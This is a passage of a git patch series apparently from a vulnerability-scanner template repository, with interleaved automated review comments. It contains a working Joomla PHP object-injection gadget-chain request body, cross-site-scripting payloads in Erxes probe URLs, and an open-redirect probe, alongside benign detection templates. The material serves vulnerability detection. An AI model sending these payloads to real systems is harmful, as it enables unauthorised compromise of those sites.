username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 redirects: true + max-redirects: 2 cookie-reuse: true extractors: - type: regex 
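Review bot: The new request body in rusty-joomla.yaml changes the marker URL to `http://rusty.jooml/;pkwxhxqxmdkkmscotwvh` inside a serialized string that carries a fixed length prefix (`s:40:`); the new value is still 40 bytes, but nothing in the template records that constraint. A comment above the raw request such as `# the feed_url marker must stay exactly 40 bytes to match its s:40: length prefix` would prevent a future rename from silently breaking the check. The extractor this hunk ends on continues outside the hunk.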
@@ -35,8 +35,9 @@ requests: regex: - " Date: Tue, 1 Feb 2022 15:46:07 -0500 Subject: [PATCH 18/49] Enhancement: cves/2018/CVE-2018-17254.yaml by cs --- cves/2018/CVE-2018-17254.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..f5f21b8399 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical @@ -27,3 +27,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by cs on 2022/02/01 From 141392e68322b19332abd8962d491481ebd64644 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 1 Feb 2022 15:46:07 -0500 Subject: [PATCH 19/49] Enhancement: cves/2018/CVE-2018-17254.yaml by cs --- cves/2018/CVE-2018-17254.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..f5f21b8399 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical @@ -27,3 +27,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by cs on 2022/02/01 From 09558de21393b27837dabd102c5179a9c33a2e8c Mon Sep 17 00:00:00 2001 
From: sullo Date: Tue, 1 Feb 2022 16:52:18 -0500 Subject: [PATCH 20/49] Adding classification --- cves/2014/CVE-2014-8682.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 25191e9b29..fcfe72ef06 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml @@ -5,17 +5,19 @@ info: author: dhiyaneshDK severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. - remediation: + remediation: Upgrade to a supported version of Gog. reference: - - http://www.securityfocus.com/bid/71187 - http://seclists.org/fulldisclosure/2014/Nov/33 - http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html - - http://gogs.io/docs/intro/change_log.html - https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d - http://www.exploit-db.com/exploits/35238 - https://exchange.xforce.ibmcloud.com/vulnerabilities/98694 - - http://www.securityfocus.com/archive/1/533995/100/0/threaded tags: cve,cve2014,sqli,gogs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2014-8682 + cwe-id: CWE-89 metadata: shodan-query: 'title:"Sign In - Gogs"' @@ -36,4 +38,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/02/01 +# Enhanced by cs on 2022/02/01 From 0d2500da981c8b6a26c937282e21d642aa1f2b06 Mon Sep 17 00:00:00 2001 From: sullo Date: Tue, 1 Feb 2022 16:57:47 -0500 Subject: [PATCH 21/49] Remove unnecessary comment --- workflows/joomla-workflow.yaml | 1 - 1 file changed, 1 deletion(-) 
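Review bot: `remediation: Upgrade to a supported version of Gog.` in CVE-2014-8682.yaml misspells the product and is vaguer than the description directly above it, which already names the fixed build; `remediation: Upgrade to Gogs 0.5.6.1105 Beta or later.` is both correct and actionable. The hunk also silently drops three references and rewrites the `Enhanced by` trailer from `mp` to `cs`, neither of which the commit message (`Adding classification`) mentions.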
diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml index f9ab969abe..077185c1ca 100644 --- a/workflows/joomla-workflow.yaml +++ b/workflows/joomla-workflow.yaml @@ -11,4 +11,3 @@ workflows: - name: joomla subtemplates: - tags: joomla -# Enhanced by cs on 2022/01/31 From f42b5dc1768504f71fb6fc5967f3bb5c3f3d0cbe Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 2 Feb 2022 12:43:39 +0900 Subject: [PATCH 22/49] Create CVE-2020-36365.yaml --- CVE-2020-36365.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 CVE-2020-36365.yaml diff --git a/CVE-2020-36365.yaml b/CVE-2020-36365.yaml new file mode 100644 index 0000000000..266c741657 --- /dev/null +++ b/CVE-2020-36365.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-36365 + +info: + name: Smartstore < 4.1.0 - Open redirect + author: 0x_Akoko + severity: medium + description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect. + reference: + - https://github.com/smartstore/SmartStoreNET/issues/2113 + - https://www.cvedetails.com/cve/CVE-2020-36365 + tags: cve,cve2020,redirect,smartstore + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-36365 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header From 940db2f928a85036531b8ea6aa162d79ebb60676 Mon Sep 17 00:00:00 2001 
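Review bot: CVE-2020-36365.yaml is created at the repository root, whereas every other CVE template in this series lives under `cves/<year>/` (compare `cves/2021/CVE-2021-45232.yaml`), so it should be `cves/2020/CVE-2020-36365.yaml` or tooling that enumerates that tree will not pick it up. The blank line between `- method: GET` and `path:` is also out of step with the other templates.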
From: Dwi Siswanto Date: Wed, 2 Feb 2022 13:27:36 +0700 Subject: [PATCH 23/49] Add CVE-2021-32853 --- cves/2021/CVE-2021-32853.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-32853.yaml diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml new file mode 100644 index 0000000000..eb38bb272c --- /dev/null +++ b/cves/2021/CVE-2021-32853.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-32853 + +info: + name: Erxes <= v0.23.0 XSS + author: dwisiswant0 + severity: medium + description: | + Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. + The value of topicID parameter is not escaped & triggered in the + enclosing script tag. + reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/widgets/knowledgebase?topicId=%22-alert(1)-%22" + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'topic_id: ""-alert(1)-""' + - 'topic_id: ""' + condition: or + + - type: word + part: body + words: + - 'window.erxesEnv' \ No newline at end of file From 3ca0582495f8c67636031433dd773f58330a07ac Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:18:15 +0100 Subject: [PATCH 24/49] Add template for Wallix Access Manager --- .../wallix-accessmanager-panel.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/wallix-accessmanager-panel.yaml diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml new file mode 100644 index 0000000000..93c952da71 --- /dev/null +++ b/exposed-panels/wallix-accessmanager-panel.yaml 
@@ -0,0 +1,34 @@ +id: wallix-accessmanager + +info: + name: Wallix Access Manager + author: righettod + severity: info + reference: + - https://www.wallix.com/privileged-access-management/access-manager/ + - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 + tags: panel,wallix + +requests: + - method: GET + path: + - '{{BaseURL}}/wabam' + - '{{BaseURL}}/wabam/favicon.ico' + + stop-at-first-match: true + redirects: true + max-redirects: 5 + matchers-condition: or + matchers: + + - type: dsl + dsl: + - "status_code==200" + - "contains(tolower(body), 'wallix access manager')" + condition: and + + - type: dsl + dsl: + - "status_code==200" + - "('1745235488' == mmh3(base64_py(body)))" + condition: and \ No newline at end of file From ac215b3b03c3945a0360db74267f73744b272e5e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:24:54 +0100 Subject: [PATCH 25/49] Fix linter error --- exposed-panels/wallix-accessmanager-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index 93c952da71..eb7d109d0e 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -31,4 +31,4 @@ requests: dsl: - "status_code==200" - "('1745235488' == mmh3(base64_py(body)))" - condition: and \ No newline at end of file + condition: and From 633205a001fd32eb8207d6e1d97ced8ae9435d1c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 2 Feb 2022 13:56:12 +0530 Subject: [PATCH 26/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index eb38bb272c..d13f138f5a 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml 
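Review bot: `id: wallix-accessmanager` in wallix-accessmanager-panel.yaml does not match the file name; the convention visible elsewhere in this series (`jamf-panel.yaml` with `id: jamf-panel`) is for the two to agree, so `id: wallix-accessmanager-panel` is expected. The favicon-hash `dsl` matcher has no comment saying which of the two paths it is meant for; `# mmh3 favicon hash of /wabam/favicon.ico` above it would make that clear. The blank line after `matchers:` and the missing trailing newline are the linter issues the following commit then has to fix.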
@@ -5,11 +5,11 @@ info: author: dwisiswant0 severity: medium description: | - Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. - The value of topicID parameter is not escaped & triggered in the + Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. + The value of topicID parameter is not escaped & triggered in the enclosing script tag. reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - tags: cve,cve2021,xss + tags: cve,cve2021,xss,erxes,oss requests: - method: GET @@ -33,4 +33,4 @@ requests: - type: word part: body words: - - 'window.erxesEnv' \ No newline at end of file + - 'window.erxesEnv' From 93b246e22d2e5cab7a997b367e27050545dab6f4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 09:26:43 +0100 Subject: [PATCH 27/49] Fix linter error --- exposed-panels/wallix-accessmanager-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index eb7d109d0e..8a4af3d0dd 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -4,7 +4,7 @@ info: name: Wallix Access Manager author: righettod severity: info - reference: + reference: - https://www.wallix.com/privileged-access-management/access-manager/ - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 tags: panel,wallix From 9a5ffc121e6c290371bdf391cbc7d504262a3ec0 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 2 Feb 2022 16:31:30 +0100 Subject: [PATCH 28/49] Add detection for the MSP version --- exposed-panels/zoho/manageengine-servicedesk.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/exposed-panels/zoho/manageengine-servicedesk.yaml b/exposed-panels/zoho/manageengine-servicedesk.yaml index eaf03fbc08..50bcd2c22a 100644 --- a/exposed-panels/zoho/manageengine-servicedesk.yaml 
+++ b/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -2,9 +2,11 @@ id: manageengine-servicedesk info: name: ZOHO ManageEngine ServiceDesk - author: dhiyaneshDK + author: dhiyaneshDK,righettod severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 + - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22 tags: panel,zoho,manageengine requests: @@ -17,6 +19,7 @@ requests: - type: word words: - 'ManageEngine ServiceDesk Plus' + - 'ManageEngine ServiceDesk Plus - MSP' - type: status status: From 83bb5912feac9d87334cc3708d9e2f8b177e623e Mon Sep 17 00:00:00 2001 From: 6d616461 Date: Wed, 2 Feb 2022 17:47:13 +0100 Subject: [PATCH 29/49] Updated CVE-2019-9618 Template --- cves/2019/CVE-2019-9618.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 58167af430..af204d6919 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -31,3 +31,4 @@ requests: - type: status status: - 200 + - 500 From 0c1fb1e69757b459ed3217d67781f7a9bbeb4205 Mon Sep 17 00:00:00 2001 From: 6d616461 Date: Wed, 2 Feb 2022 18:36:24 +0100 Subject: [PATCH 30/49] Updated CVE-2016-10956 Template --- cves/2016/CVE-2016-10956.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 0d3a7bd668..415c6b87c8 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -30,3 +30,4 @@ requests: - type: status status: - 200 + - 500 From 7b2f90753bdb79121da3fc2958964d5044b65748 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 01:51:49 +0530 Subject: [PATCH 31/49] Update wallix-accessmanager-panel.yaml --- exposed-panels/wallix-accessmanager-panel.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) 
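Review bot: The added word `'ManageEngine ServiceDesk Plus - MSP'` can never change the outcome of this matcher, because the pre-existing `'ManageEngine ServiceDesk Plus'` is a substring of it and the `words` list uses the default `or`. If the intent is to distinguish the MSP edition in results, that belongs in an extractor rather than a second word, e.g. `extractors: - type: regex / group: 0 / regex: - 'ManageEngine ServiceDesk Plus(?: - MSP)?'`. The status matcher that follows continues outside the hunk.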
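Review bot: Adding `- 500` to the `status` matcher in CVE-2019-9618 (and identically in CVE-2016-10956) widens both templates to error responses, and whether that is safe depends on the companion matchers, which are outside these hunks. If the other matcher is a body word that can also appear in a stack trace or generic error page, an endpoint that merely crashes on the probe would now be reported as vulnerable. Please confirm the word matcher only fires on content the vulnerable response emits, and record the reason inline, e.g. `- 500  # NOTE(review): observed from vulnerable builds — confirm against a known-vulnerable instance`.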
diff --git a/exposed-panels/wallix-accessmanager-panel.yaml b/exposed-panels/wallix-accessmanager-panel.yaml index 8a4af3d0dd..d6f8e7d313 100644 --- a/exposed-panels/wallix-accessmanager-panel.yaml +++ b/exposed-panels/wallix-accessmanager-panel.yaml @@ -1,12 +1,12 @@ -id: wallix-accessmanager +id: wallix-accessmanager-panel info: - name: Wallix Access Manager + name: Wallix Access Manager Panel author: righettod severity: info - reference: - - https://www.wallix.com/privileged-access-management/access-manager/ - - https://www.shodan.io/search?query=http.title%3A%22Wallix+Access+Manager%22 + reference: https://www.wallix.com/privileged-access-management/access-manager/ + metadata: + shodan-query: http.title:"Wallix Access Manager" tags: panel,wallix requests: @@ -17,10 +17,9 @@ requests: stop-at-first-match: true redirects: true - max-redirects: 5 + max-redirects: 3 matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" From 110704dd3e1af363ca7b03c36cafd075eb3c89bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:01:24 +0530 Subject: [PATCH 32/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 36 +++++++++++++++++------------------ 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index d13f138f5a..08e567143f 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml 
@@ -4,33 +4,31 @@ info: name: Erxes <= v0.23.0 XSS author: dwisiswant0 severity: medium - description: | - Erxes prior to version 0.23.0 is vulnerable to cross-site scripting. - The value of topicID parameter is not escaped & triggered in the - enclosing script tag. - reference: https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 tags: cve,cve2021,xss,erxes,oss requests: - method: GET path: - - "{{BaseURL}}/widgets/knowledgebase?topicId=%22-alert(1)-%22" - - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + - "" + - "window.erxesEnv" + condition: and + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - part: body - words: - - 'topic_id: ""-alert(1)-""' - - 'topic_id: ""' - condition: or - - - type: word - part: body - words: - - 'window.erxesEnv' From 9f63a2f4fb68a12496360d85d5e193237ea5e6d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:06:26 +0530 Subject: [PATCH 33/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index 08e567143f..90738a22c6 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml 
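Review bot: The new reference `https://nvd.nist.gov/vuln/detail/CVE-2021-3285` points at a different CVE identifier than this template's own `cve-id` (the trailing digit is missing); it should read `- https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. The rewritten body matcher's first word renders here as an empty string `""`, which if literal would match every response; presumably markup was stripped in this view, but the committed value needs to contain the injected `</script><script>alert(document.domain)</script>` sequence, not just the surrounding `topic_id` key. Also the collapsed description now reads `scripting.The value` and wants a space after the period.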
@@ -8,6 +8,8 @@ info: reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 + metadata: + shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss requests: From 9decb6c1199a30749833c06fa07981beadce9e86 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:09:01 +0530 Subject: [PATCH 34/49] Create erxes-detect.yaml --- technologies/erxes-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/erxes-detect.yaml diff --git a/technologies/erxes-detect.yaml b/technologies/erxes-detect.yaml new file mode 100644 index 0000000000..5d27efeaeb --- /dev/null +++ b/technologies/erxes-detect.yaml @@ -0,0 +1,25 @@ +id: erxes-detect + +info: + name: Erxes Detect + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"erxes" + tags: tech,erxes + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "erxes(.*)" + + - type: status + status: + - 200 From b023c8206e07b56609a07fec49a0a63fc55178ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:14:21 +0530 Subject: [PATCH 35/49] Update CVE-2021-32853.yaml --- cves/2021/CVE-2021-32853.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-32853.yaml b/cves/2021/CVE-2021-32853.yaml index 90738a22c6..ff1a4f5426 100644 --- a/cves/2021/CVE-2021-32853.yaml +++ b/cves/2021/CVE-2021-32853.yaml @@ -22,7 +22,7 @@ requests: - type: word part: body words: - - "" + - 'topic_id: "' - "window.erxesEnv" condition: and From 0e6a797abaa3764cb52c9979851bd07d60f18402 Mon Sep 17 00:00:00 2001 
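Review bot: The `erxes-detect` regex `erxes(.*)` matches any 200 page that mentions the string "erxes" anywhere in its body, including blog posts, changelogs and unrelated apps embedding the widget script, so the detector will over-report; the capture group is also unused by any extractor. Anchor on a marker the application itself emits, e.g. `regex: - 'window\.erxesEnv'` or the page title, and only add a capture group if an extractor consumes it.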
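Review bot: In the PATCH 35 hunk the replacement word renders as `'topic_id: "'`, a prefix every knowledgebase page emits regardless of the payload; if the committed value is really just that, the `and` with `window.erxesEnv` proves only that Erxes is present and the parameter is echoed, not that the injected tags survive escaping. If the value actually continues with the `</script><script>alert(document.domain)</script>` sequence and was stripped in this view, ignore this, but the word should then be quoted so the embedded quote and tags are preserved exactly as the page emits them.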
From: Prince Chaddha Date: Thu, 3 Feb 2022 02:37:27 +0530 Subject: [PATCH 36/49] Create smartstore-detect.yaml --- technologies/smartstore-detect.yaml | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 technologies/smartstore-detect.yaml diff --git a/technologies/smartstore-detect.yaml b/technologies/smartstore-detect.yaml new file mode 100644 index 0000000000..d23f0b1114 --- /dev/null +++ b/technologies/smartstore-detect.yaml @@ -0,0 +1,33 @@ +id: smartstore-detect + +info: + name: SmartStoreNET Detect + author: princechaddha + severity: info + metadata: + shodan-query: http.html:'content="Smartstore' + tags: tech,smartstorenet,oos + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: body + regex: + - '' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' From 01f44b267594867780117e37498adf866481cb6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 3 Feb 2022 02:39:14 +0530 Subject: [PATCH 37/49] Update smartstore-detect.yaml --- technologies/smartstore-detect.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/technologies/smartstore-detect.yaml b/technologies/smartstore-detect.yaml index d23f0b1114..422d7c915a 100644 --- a/technologies/smartstore-detect.yaml +++ b/technologies/smartstore-detect.yaml @@ -1,12 +1,13 @@ id: smartstore-detect info: - name: SmartStoreNET Detect + name: SmartStore Detect author: princechaddha severity: info + reference: https://github.com/smartstore/SmartStoreNET metadata: shodan-query: http.html:'content="Smartstore' - tags: tech,smartstorenet,oos + tags: tech,smartstore,oos requests: - method: GET From 42bc9418274ff6e67b3a3effa9de3280a348ed6a Mon Sep 17 00:00:00 2001 
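Review bot: The tag `oos` in `tags: tech,smartstore,oos` looks like a typo of `oss`, which is the tag CVE-2021-32853 in this same series uses for open-source projects; a misspelled tag silently drops the template from `-tags oss` runs, so it should be `tags: tech,smartstore,oss`. The body regex and the extractor regex both render as empty strings in this view, presumably because the `<meta name="generator" ...>` markup was stripped; please double-check the committed values are non-empty, since an empty regex matches every response and would make the status check the only gate.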
From: Prince Chaddha Date: Thu, 3 Feb 2022 02:39:33 +0530 Subject: [PATCH 38/49] Update and rename CVE-2020-36365.yaml to cves/2020/CVE-2020-36365.yaml --- CVE-2020-36365.yaml => cves/2020/CVE-2020-36365.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename CVE-2020-36365.yaml => cves/2020/CVE-2020-36365.yaml (74%) diff --git a/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml similarity index 74% rename from CVE-2020-36365.yaml rename to cves/2020/CVE-2020-36365.yaml index 266c741657..771c887368 100644 --- a/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -8,12 +8,15 @@ info: reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - https://www.cvedetails.com/cve/CVE-2020-36365 - tags: cve,cve2020,redirect,smartstore + - https://github.com/smartstore/SmartStoreNET classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2020-36365 cwe-id: CWE-601 + metadata: + shodan-query: http.html:'content="Smartstore' + tags: cve,cve2020,redirect,smartstore requests: - method: GET @@ -23,6 +26,6 @@ requests: matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From c727898abe4c297924e98358763b6fc180efa592 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Thu, 3 Feb 2022 12:15:15 +0700 Subject: [PATCH 39/49] update: addeventlistener-detect --- miscellaneous/addeventlistener-detect.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/miscellaneous/addeventlistener-detect.yaml b/miscellaneous/addeventlistener-detect.yaml index fb29b8ba5a..c1bc920d1c 100644 --- a/miscellaneous/addeventlistener-detect.yaml +++ b/miscellaneous/addeventlistener-detect.yaml 
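Review bot: The trailing `(\/|[^.].*)?$` in the new `Location` regex was evidently added to reject `example.com.evil.tld`, but it still accepts any non-dot continuation, so `Location: https://example.comevil.tld/` is reported as a redirect to example.com. Terminating the host on a delimiter is tighter and keeps the intended path/query cases: `example\.com(?::\d+)?(?:[/?#].*)?$`. The leading `[a-zA-Z0-9\-_\.@]*` also admits a userinfo prefix such as `evil.tld@example.com`, which is probably desirable for a redirect test but worth a one-line comment so the next editor does not "fix" it; the request that sets the payload is outside this hunk.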
@@ -1,8 +1,8 @@ id: addeventlistener-detect info: - name: AddEventlistener detection - author: yavolo + name: DOM EventListener detection + author: yavolo, dwisiswant0 severity: info tags: xss,misc reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source @@ -10,10 +10,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: word + - type: regex part: body - words: - - 'window.addEventListener(' + regex: + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 \ No newline at end of file From bc87c82d9b7c61c146d6cdeb6573156feacf224c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 3 Feb 2022 18:06:04 +0900 Subject: [PATCH 40/49] Create CVE-2021-20150.yaml Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. 